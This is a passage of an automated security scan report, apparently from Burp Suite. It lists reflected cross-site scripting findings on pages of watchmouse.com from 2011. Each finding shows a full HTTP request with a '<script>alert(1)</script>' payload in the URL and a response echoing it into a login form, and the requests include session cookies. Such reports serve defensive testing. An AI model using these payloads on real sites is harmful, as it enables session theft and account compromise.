<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/root-cause-analysis.html?a0776"><script>alert(1)</script>e915fb25c57=1" method="post">
...[SNIP]...

1.143. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/the-watchmouse-api.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9656f"><script>alert(1)</script>8d1ba6a5b9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9656f"><script>alert(1)</script>8d1ba6a5b9a/feature/the-watchmouse-api.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-87555b0c1bac3769ae7043173709c5e1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9656f"><script>alert(1)</script>8d1ba6a5b9a/feature/the-watchmouse-api.html" method="post">
...[SNIP]...

1.144. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/the-watchmouse-api.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e5ce"><script>alert(1)</script>c0662cbc4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature5e5ce"><script>alert(1)</script>c0662cbc4e4/the-watchmouse-api.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-eb1c6aca7a7e8382fa9392c8d91402da"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature5e5ce"><script>alert(1)</script>c0662cbc4e4/the-watchmouse-api.html" method="post">
...[SNIP]...

1.145. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/the-watchmouse-api.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da742"><script>alert(1)</script>c96b812039a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/the-watchmouse-api.htmlda742"><script>alert(1)</script>c96b812039a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-90409673a44ca603b7eec973849dfdac"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/the-watchmouse-api.htmlda742"><script>alert(1)</script>c96b812039a" method="post">
...[SNIP]...

1.146. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/the-watchmouse-api.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45397"><script>alert(1)</script>f2e77e28a8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/the-watchmouse-api.html?45397"><script>alert(1)</script>f2e77e28a8c=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b682dcf1b2a1b4f034e4e93bb4ad80ea"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/the-watchmouse-api.html?45397"><script>alert(1)</script>f2e77e28a8c=1" method="post">
...[SNIP]...

1.147. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/tos.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4912b"><script>alert(1)</script>ed30d7fc365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en4912b"><script>alert(1)</script>ed30d7fc365/feature/tos.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5672264136862882048b960f9860f4c1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en4912b"><script>alert(1)</script>ed30d7fc365/feature/tos.php" method="post">
...[SNIP]...

1.148. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/tos.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 632e1"><script>alert(1)</script>a85a65403a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature632e1"><script>alert(1)</script>a85a65403a9/tos.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-765f31dc37df368d4db9a27995d4b6af"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature632e1"><script>alert(1)</script>a85a65403a9/tos.php" method="post">
...[SNIP]...

1.149. http://www.watchmouse.com/en/feature/tos.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/tos.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a912"><script>alert(1)</script>67e6b80b0c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/tos.php9a912"><script>alert(1)</script>67e6b80b0c6 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-01969147216bc344f84c8cb1d76a0d81"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/tos.php9a912"><script>alert(1)</script>67e6b80b0c6" method="post">
...[SNIP]...

1.150. http://www.watchmouse.com/en/feature/tos.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/tos.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50511"><script>alert(1)</script>92056369859 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/tos.php?50511"><script>alert(1)</script>92056369859=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:01 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-c20868fa7c3ff027b53824f9cbd16cf4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/tos.php?50511"><script>alert(1)</script>92056369859=1" method="post">
...[SNIP]...

1.151. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9980a"><script>alert(1)</script>0af79ea25a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9980a"><script>alert(1)</script>0af79ea25a4/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:05:23 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-7dbefcaf852441a510cf571441445e18"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9980a"><script>alert(1)</script>0af79ea25a4/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.152. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99131"><script>alert(1)</script>26edbd2bf06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature99131"><script>alert(1)</script>26edbd2bf06/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-0953ac9f5837ea38545a94c48b8321c2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature99131"><script>alert(1)</script>26edbd2bf06/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.153. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d70"><script>alert(1)</script>8c0caad865a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/transaction-monitoring-web-application-testing.html26d70"><script>alert(1)</script>8c0caad865a HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f5a6ccccbf816257844868050b9a0d72"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html26d70"><script>alert(1)</script>8c0caad865a" method="post">
...[SNIP]...

1.154. http://www.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5586b"><script>alert(1)</script>71fd46db455 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/transaction-monitoring-web-application-testing.html?5586b"><script>alert(1)</script>71fd46db455=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:05:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-fb1d3d61ca5076032bc2711df8f98740"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/transaction-monitoring-web-application-testing.html?5586b"><script>alert(1)</script>71fd46db455=1" method="post">
...[SNIP]...

1.155. http://www.watchmouse.com/en/feed.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feed.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df462"><script>alert(1)</script>7db7836a50e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /endf462"><script>alert(1)</script>7db7836a50e/feed.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2d36c6d3101076669f36db6c9995c73f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/endf462"><script>alert(1)</script>7db7836a50e/feed.php" method="post">
...[SNIP]...

1.156. http://www.watchmouse.com/en/feed.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feed.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff9ba"><script>alert(1)</script>ed691d874bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

